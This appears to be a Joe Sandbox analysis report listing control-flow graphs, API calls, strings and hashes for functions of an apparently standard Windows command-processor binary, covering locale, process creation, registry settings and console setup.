                                      control_flow_graph 398 7ff755cb51ec-7ff755cb5248 call 7ff755cb5508 GetLocaleInfoW 401 7ff755cbef32-7ff755cbef3c 398->401 402 7ff755cb524e-7ff755cb5272 GetLocaleInfoW 398->402 405 7ff755cbef3f-7ff755cbef49 401->405 403 7ff755cb5295-7ff755cb52b9 GetLocaleInfoW 402->403 404 7ff755cb5274-7ff755cb527a 402->404 408 7ff755cb52de-7ff755cb5305 GetLocaleInfoW 403->408 409 7ff755cb52bb-7ff755cb52c3 403->409 406 7ff755cb5280-7ff755cb5286 404->406 407 7ff755cb54f7-7ff755cb54f9 404->407 410 7ff755cbef61-7ff755cbef6c 405->410 411 7ff755cbef4b-7ff755cbef52 405->411 406->407 412 7ff755cb528c-7ff755cb528f 406->412 407->401 415 7ff755cb5321-7ff755cb5343 GetLocaleInfoW 408->415 416 7ff755cb5307-7ff755cb531b 408->416 413 7ff755cbef75-7ff755cbef78 409->413 414 7ff755cb52c9-7ff755cb52d7 409->414 410->413 411->410 417 7ff755cbef54-7ff755cbef5f 411->417 412->403 418 7ff755cbef7a-7ff755cbef7d 413->418 419 7ff755cbef99-7ff755cbefa3 413->419 414->408 420 7ff755cbefaf-7ff755cbefb9 415->420 421 7ff755cb5349-7ff755cb536e GetLocaleInfoW 415->421 416->415 417->405 417->410 418->408 422 7ff755cbef83-7ff755cbef8d 418->422 419->420 423 7ff755cbefbc-7ff755cbefc6 420->423 424 7ff755cbeff2-7ff755cbeffc 421->424 425 7ff755cb5374-7ff755cb5396 GetLocaleInfoW 421->425 422->419 426 7ff755cbefc8-7ff755cbefcf 423->426 427 7ff755cbefde-7ff755cbefe9 423->427 428 7ff755cbefff-7ff755cbf009 424->428 429 7ff755cbf035-7ff755cbf03f 425->429 430 7ff755cb539c-7ff755cb53be GetLocaleInfoW 425->430 426->427 434 7ff755cbefd1-7ff755cbefdc 426->434 427->424 435 7ff755cbf021-7ff755cbf02c 428->435 436 7ff755cbf00b-7ff755cbf012 428->436 433 7ff755cbf042-7ff755cbf04c 429->433 431 7ff755cb53c4-7ff755cb53e6 GetLocaleInfoW 430->431 432 7ff755cbf078-7ff755cbf082 430->432 438 7ff755cbf0bb-7ff755cbf0c5 431->438 439 7ff755cb53ec-7ff755cb540e GetLocaleInfoW 431->439 442 7ff755cbf085-7ff755cbf08f 432->442 440 7ff755cbf064-7ff755cbf06f 433->440 441 7ff755cbf04e-7ff755cbf055 433->441 434->423 434->427 
435->429 436->435 437 7ff755cbf014-7ff755cbf01f 436->437 437->428 437->435 443 7ff755cbf0c8-7ff755cbf0d2 438->443 444 7ff755cb5414-7ff755cb5436 GetLocaleInfoW 439->444 445 7ff755cbf0fe-7ff755cbf108 439->445 440->432 441->440 446 7ff755cbf057-7ff755cbf062 441->446 447 7ff755cbf091-7ff755cbf098 442->447 448 7ff755cbf0a7-7ff755cbf0b2 442->448 449 7ff755cbf0d4-7ff755cbf0db 443->449 450 7ff755cbf0ea-7ff755cbf0f5 443->450 451 7ff755cbf141-7ff755cbf14b 444->451 452 7ff755cb543c-7ff755cb545e GetLocaleInfoW 444->452 453 7ff755cbf10b-7ff755cbf115 445->453 446->433 446->440 447->448 454 7ff755cbf09a-7ff755cbf0a5 447->454 448->438 449->450 455 7ff755cbf0dd-7ff755cbf0e8 449->455 450->445 460 7ff755cbf14e-7ff755cbf158 451->460 456 7ff755cbf184-7ff755cbf18b 452->456 457 7ff755cb5464-7ff755cb5486 GetLocaleInfoW 452->457 458 7ff755cbf117-7ff755cbf11e 453->458 459 7ff755cbf12d-7ff755cbf138 453->459 454->442 454->448 455->443 455->450 461 7ff755cbf18e-7ff755cbf198 456->461 462 7ff755cbf1c4-7ff755cbf1ce 457->462 463 7ff755cb548c-7ff755cb54ae GetLocaleInfoW 457->463 458->459 464 7ff755cbf120-7ff755cbf12b 458->464 459->451 465 7ff755cbf170-7ff755cbf17b 460->465 466 7ff755cbf15a-7ff755cbf161 460->466 467 7ff755cbf1b0-7ff755cbf1bb 461->467 468 7ff755cbf19a-7ff755cbf1a1 461->468 471 7ff755cbf1d1-7ff755cbf1db 462->471 469 7ff755cb54b4-7ff755cb54f5 setlocale call 7ff755cb8f80 463->469 470 7ff755cbf207-7ff755cbf20e 463->470 464->453 464->459 465->456 466->465 472 7ff755cbf163-7ff755cbf16e 466->472 467->462 468->467 473 7ff755cbf1a3-7ff755cbf1ae 468->473 477 7ff755cbf211-7ff755cbf21b 470->477 475 7ff755cbf1f3-7ff755cbf1fe 471->475 476 7ff755cbf1dd-7ff755cbf1e4 471->476 472->460 472->465 473->461 473->467 475->470 476->475 479 7ff755cbf1e6-7ff755cbf1f1 476->479 480 7ff755cbf233-7ff755cbf23e 477->480 481 7ff755cbf21d-7ff755cbf224 477->481 479->471 479->475 481->480 482 7ff755cbf226-7ff755cbf231 481->482 482->477 482->480
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: InfoLocale$DefaultUsersetlocale
                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                      • API String ID: 1351325837-2236139042
                                      • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                      • Instruction ID: 9fac823f83673bf4297bfa265f0e0e737c13d808f698f67aa97ed36ac6030f74
                                      • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                      • Instruction Fuzzy Hash: 3DF138BAB0868385EE51AF15E9102B9B3A4BF45F98FD84135CA0D577A4EF3CE905C320

                                      Control-flow Graph

                                      control_flow_graph 483 7ff755cb4224-7ff755cb42a5 InitializeProcThreadAttributeList 484 7ff755cbecd4-7ff755cbecee GetLastError call 7ff755cc9eec 483->484 485 7ff755cb42ab-7ff755cb42e5 UpdateProcThreadAttribute 483->485 492 7ff755cbed1e 484->492 487 7ff755cbecf0-7ff755cbed19 GetLastError call 7ff755cc9eec DeleteProcThreadAttributeList 485->487 488 7ff755cb42eb-7ff755cb43c6 memset * 2 GetStartupInfoW call 7ff755cb3a90 call 7ff755cab900 485->488 487->492 497 7ff755cb4638-7ff755cb4644 _local_unwind 488->497 498 7ff755cb43cc-7ff755cb43d3 488->498 499 7ff755cb4649-7ff755cb4650 497->499 498->499 500 7ff755cb43d9-7ff755cb43dc 498->500 499->500 501 7ff755cb4656-7ff755cb465d 499->501 502 7ff755cb4415-7ff755cb4424 call 7ff755cb5a68 500->502 503 7ff755cb43de-7ff755cb43f5 wcsrchr 500->503 501->502 505 7ff755cb4663 501->505 510 7ff755cb4589-7ff755cb4590 502->510 511 7ff755cb442a-7ff755cb4486 CreateProcessW 502->511 503->502 504 7ff755cb43f7-7ff755cb440f lstrcmpW 503->504 504->502 507 7ff755cb4668-7ff755cb466d call 7ff755cc9044 504->507 505->500 507->502 510->511 514 7ff755cb4596-7ff755cb45fa CreateProcessAsUserW 510->514 513 7ff755cb448b-7ff755cb448f 511->513 515 7ff755cb4672-7ff755cb4682 GetLastError 513->515 516 7ff755cb4495-7ff755cb44c7 CloseHandle call 7ff755cb498c 513->516 514->513 518 7ff755cb468d-7ff755cb4694 515->518 516->518 522 7ff755cb44cd-7ff755cb44e5 516->522 520 7ff755cb46a2-7ff755cb46ac 518->520 521 7ff755cb4696-7ff755cb46a0 518->521 523 7ff755cb46ae-7ff755cb46b5 call 7ff755cb97bc 520->523 526 7ff755cb4705-7ff755cb4707 520->526 521->520 521->523 524 7ff755cb47a3-7ff755cb47a9 522->524 525 7ff755cb44eb-7ff755cb44f2 522->525 541 7ff755cb4703 523->541 542 7ff755cb46b7-7ff755cb4701 call 7ff755cfc038 523->542 528 7ff755cb45ff-7ff755cb4607 525->528 529 7ff755cb44f8-7ff755cb4507 525->529 526->522 527 7ff755cb470d-7ff755cb472a call 7ff755cacd90 526->527 543 7ff755cb473d-7ff755cb4767 call 7ff755cb13e0 call 7ff755cc9eec call 7ff755caff70 
_local_unwind 527->543 544 7ff755cb472c-7ff755cb4738 _local_unwind 527->544 528->529 532 7ff755cb460d 528->532 533 7ff755cb4612-7ff755cb4616 529->533 534 7ff755cb450d-7ff755cb4553 call 7ff755cb5cb4 call 7ff755cb33f0 call 7ff755cb498c 529->534 537 7ff755cb476c-7ff755cb4773 532->537 539 7ff755cb47d7-7ff755cb47df 533->539 540 7ff755cb461c-7ff755cb4633 533->540 564 7ff755cb4558-7ff755cb455e 534->564 537->529 548 7ff755cb4779-7ff755cb4780 537->548 545 7ff755cb47e1-7ff755cb47ed CloseHandle 539->545 546 7ff755cb47f2-7ff755cb483c call 7ff755caff70 DeleteProcThreadAttributeList call 7ff755cb8f80 539->546 540->546 541->526 542->526 543->537 544->543 545->546 548->529 550 7ff755cb4786-7ff755cb4789 548->550 550->529 556 7ff755cb478f-7ff755cb4792 550->556 556->524 560 7ff755cb4794-7ff755cb479d call 7ff755cca250 556->560 560->524 560->529 567 7ff755cb4564-7ff755cb4579 call 7ff755cb498c 564->567 568 7ff755cb47ae-7ff755cb47ca call 7ff755cb33f0 564->568 567->546 576 7ff755cb457f-7ff755cb4584 call 7ff755cca920 567->576 568->539 576->546
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                      • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                      • API String ID: 388421343-2905461000
                                      • Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                      • Instruction ID: 40d428850cb47206035b04ae96e73c262031e91a8afa3d716a7acea031b48001
                                      • Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
                                      • Instruction Fuzzy Hash: 55F14FBBA0CA8385EA60AB11E4907B9F7A5FB85F98FC84135D94D46754DF3CE844CB20

                                      Control-flow Graph

                                      control_flow_graph 579 7ff755cb5554-7ff755cb55b9 call 7ff755cba640 582 7ff755cb55bc-7ff755cb55e8 RegOpenKeyExW 579->582 583 7ff755cb5887-7ff755cb588e 582->583 584 7ff755cb55ee-7ff755cb5631 RegQueryValueExW 582->584 583->582 587 7ff755cb5894-7ff755cb58db time srand call 7ff755cb8f80 583->587 585 7ff755cbf248-7ff755cbf24d 584->585 586 7ff755cb5637-7ff755cb5675 RegQueryValueExW 584->586 591 7ff755cbf260-7ff755cbf265 585->591 592 7ff755cbf24f-7ff755cbf25b 585->592 588 7ff755cb5677-7ff755cb567c 586->588 589 7ff755cb568e-7ff755cb56cc RegQueryValueExW 586->589 594 7ff755cb5682-7ff755cb5687 588->594 595 7ff755cbf28b-7ff755cbf290 588->595 596 7ff755cb56d2-7ff755cb5710 RegQueryValueExW 589->596 597 7ff755cbf2b6-7ff755cbf2bb 589->597 591->586 593 7ff755cbf26b-7ff755cbf286 _wtol 591->593 592->586 593->586 594->589 595->589 599 7ff755cbf296-7ff755cbf2b1 _wtol 595->599 602 7ff755cb5712-7ff755cb5717 596->602 603 7ff755cb5729-7ff755cb5767 RegQueryValueExW 596->603 600 7ff755cbf2ce-7ff755cbf2d3 597->600 601 7ff755cbf2bd-7ff755cbf2c9 597->601 599->589 600->596 604 7ff755cbf2d9-7ff755cbf2f4 _wtol 600->604 601->596 605 7ff755cbf2f9-7ff755cbf2fe 602->605 606 7ff755cb571d-7ff755cb5722 602->606 607 7ff755cb579f-7ff755cb57dd RegQueryValueExW 603->607 608 7ff755cb5769-7ff755cb576e 603->608 604->596 605->603 611 7ff755cbf304-7ff755cbf31a wcstol 605->611 606->603 609 7ff755cb57e3-7ff755cb57e8 607->609 610 7ff755cbf3a9 607->610 612 7ff755cbf320-7ff755cbf325 608->612 613 7ff755cb5774-7ff755cb578f 608->613 614 7ff755cbf363-7ff755cbf368 609->614 615 7ff755cb57ee-7ff755cb5809 609->615 624 7ff755cbf3b5-7ff755cbf3b8 610->624 611->612 616 7ff755cbf327-7ff755cbf33f wcstol 612->616 617 7ff755cbf34b 612->617 618 7ff755cb5795-7ff755cb5799 613->618 619 7ff755cbf357-7ff755cbf35e 613->619 620 7ff755cbf36a-7ff755cbf382 wcstol 614->620 621 7ff755cbf38e 614->621 622 7ff755cb580f-7ff755cb5813 615->622 623 7ff755cbf39a-7ff755cbf39d 615->623 616->617 617->619 618->607 
618->619 619->607 620->621 621->623 622->623 625 7ff755cb5819-7ff755cb5823 622->625 623->610 626 7ff755cbf3be-7ff755cbf3c5 624->626 627 7ff755cb582c 624->627 625->624 628 7ff755cb5829 625->628 629 7ff755cb5832-7ff755cb5870 RegQueryValueExW 626->629 627->629 630 7ff755cbf3ca-7ff755cbf3d1 627->630 628->627 631 7ff755cb5876-7ff755cb5882 RegCloseKey 629->631 632 7ff755cbf3dd-7ff755cbf3e2 629->632 630->632 631->583 633 7ff755cbf3e4-7ff755cbf412 ExpandEnvironmentStringsW 632->633 634 7ff755cbf433-7ff755cbf439 632->634 636 7ff755cbf414-7ff755cbf426 call 7ff755cb13e0 633->636 637 7ff755cbf428 633->637 634->631 635 7ff755cbf43f-7ff755cbf44c call 7ff755cab900 634->635 635->631 639 7ff755cbf42e 636->639 637->639 639->634
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: QueryValue$CloseOpensrandtime
                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                      • API String ID: 145004033-3846321370
                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                      • Instruction ID: 96d392af58282d8b8357ef85d955c4ce233eec4dff2496abd7491d3cd07ee5d1
                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                      • Instruction Fuzzy Hash: E8E194BB92C683C6E790AB10E45017AF7A0FB89F59FC85135EA8E42A54DF7CD544CB20

                                      Control-flow Graph

                                      Control-flow graph of the function at 7ff755cb37d8 (graph image not reproduced). Basic blocks in the graph call GetCurrentThreadId, OpenThread, HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetConsoleOutputCP, GetCPInfo, GetThreadLocale, memset, _setjmp and _setmode.
                                      Similarity
                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                      • API String ID: 2624720099-1920437939
                                      • Opcode ID: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                      • Instruction ID: 947aa4185e6d32f6ed324634c37020d85f0884062df1c32d718c5c27077101e6
                                      • Opcode Fuzzy Hash: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                      • Instruction Fuzzy Hash: 87C182BBE086838AF754BB6098501B8FBA1EF45F6CFCC4139D90E57691DE3CA8458660

                                      Control-flow Graph

                                      Control-flow graph of the function at 7ff755cb823c (graph image not reproduced). Basic blocks in the graph call FindFirstFileExW, FindNextFileW, FindClose, GetLastError, GetProcessHeap, HeapAlloc and HeapReAlloc.
                                      Similarity
                                      • API ID: ErrorFileFindFirstLast
                                      • String ID:
                                      • API String ID: 873889042-0
                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                      • Instruction ID: 898cbbf6f98cefebe8f76a33f97193f8dc682c7c4905a5e9254f387ea2a84903
                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                      • Instruction Fuzzy Hash: D75129BBA09B8386EB40AB11E544179BBA0FB4AF99FCD9135CA1D43390DF3CE4548760

                                      Control-flow Graph

                                      Control-flow graph of the function at 7ff755cb2978 (graph image not reproduced). Basic blocks in the graph call FindFirstFileW, FindClose, _wcsnicmp, _wcsicmp and memmove.
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                      • Instruction ID: d37bc348147a46ae2b29eba4e16fcb82bf632852541d90978184de6b273c6774
                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                      • Instruction Fuzzy Hash: 185116A7F0868385EA30AB5599442BAE390FB45FB8FCC5230DE6E476D0DF3CE8418610

                                      Control-flow Graph

                                      Control-flow graph of the function at 7ff755cb4d5c (graph image not reproduced). Basic blocks in the graph call InitializeCriticalSection, SetConsoleCtrlHandler, _get_osfhandle, GetConsoleMode, GetCommandLineW, GetWindowsDirectoryW, GetConsoleOutputCP, GetCPInfo, GetProcessHeap, HeapAlloc, GetConsoleTitleW, GetStdHandle, GetConsoleScreenBufferInfo, GlobalFree, GetModuleHandleW, GetProcAddress and free.
                                      APIs
                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4D9A
                                        • Part of subcall function 00007FF755CB58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF755CCC6DB), ref: 00007FF755CB58EF
                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4DBB
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB4DCA
                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4DE0
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CB4DEE
                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E04
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB0589
                                        • Part of subcall function 00007FF755CB0580: SetConsoleMode.KERNELBASE ref: 00007FF755CB059E
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB05AF
                                        • Part of subcall function 00007FF755CB0580: GetConsoleMode.KERNELBASE ref: 00007FF755CB05C5
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB05EF
                                        • Part of subcall function 00007FF755CB0580: GetConsoleMode.KERNELBASE ref: 00007FF755CB0605
                                        • Part of subcall function 00007FF755CB0580: _get_osfhandle.MSVCRT ref: 00007FF755CB0632
                                        • Part of subcall function 00007FF755CB0580: SetConsoleMode.KERNELBASE ref: 00007FF755CB0647
                                        • Part of subcall function 00007FF755CB4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A28
                                        • Part of subcall function 00007FF755CB4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A66
                                        • Part of subcall function 00007FF755CB4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A7D
                                        • Part of subcall function 00007FF755CB4A14: memmove.MSVCRT(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4A9A
                                        • Part of subcall function 00007FF755CB4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF755CB49F1), ref: 00007FF755CB4AA2
                                        • Part of subcall function 00007FF755CB4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AD6
                                        • Part of subcall function 00007FF755CB4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CA8798), ref: 00007FF755CB4AEF
                                        • Part of subcall function 00007FF755CB5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF755CB4E35), ref: 00007FF755CB55DA
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5623
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5667
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB56BE
                                        • Part of subcall function 00007FF755CB5554: RegQueryValueExW.KERNELBASE ref: 00007FF755CB5702
                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E35
                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4E81
                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4F69
                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4F95
                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FB0
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FC1
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FD8
                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB4FF8
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5037
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB504B
                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB50DF
                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB50F2
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB510F
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5130
                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB514A
                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF755CB5175
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      Similarity
                                      • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                      • API String ID: 1049357271-3021193919
                                      • Opcode ID: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                      • Instruction ID: 34fd07a89923f737413449967e35eeeeec52b77dd5d007abf6ac500ea12b64b1
                                      • Opcode Fuzzy Hash: fa8d2def7bb0d79b836b7894b6796c7ff966ef088737a8baff12253f96499c8d
                                      • Instruction Fuzzy Hash: 1CC152FBA08A8386EA40BB11E854179F7A1FF85F99FCC4135D90E47791EF3CA8458260

                                      Control-flow Graph

                                      Control-flow graph of the function at 7ff755cb3c24 (graph image not reproduced). Basic blocks in the graph call GetCurrentDirectoryW, towupper, iswalpha, GetFullPathNameW, GetFileAttributesW, SetCurrentDirectoryW, GetLastError and _local_unwind.
                                      Similarity
                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                      • String ID: :
                                      • API String ID: 1809961153-336475711
                                      • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                      • Instruction ID: fa62394016a20937b2aca496992eb8b8f9b151329572276e60d126a9a8bc4680
                                      • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                      • Instruction Fuzzy Hash: B9D16FABA0CB8691EA60EB15E4542B9F7A1FB84F58FC84135D98E437A4DF3CE944C710

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                      • API String ID: 2622545777-4197029667
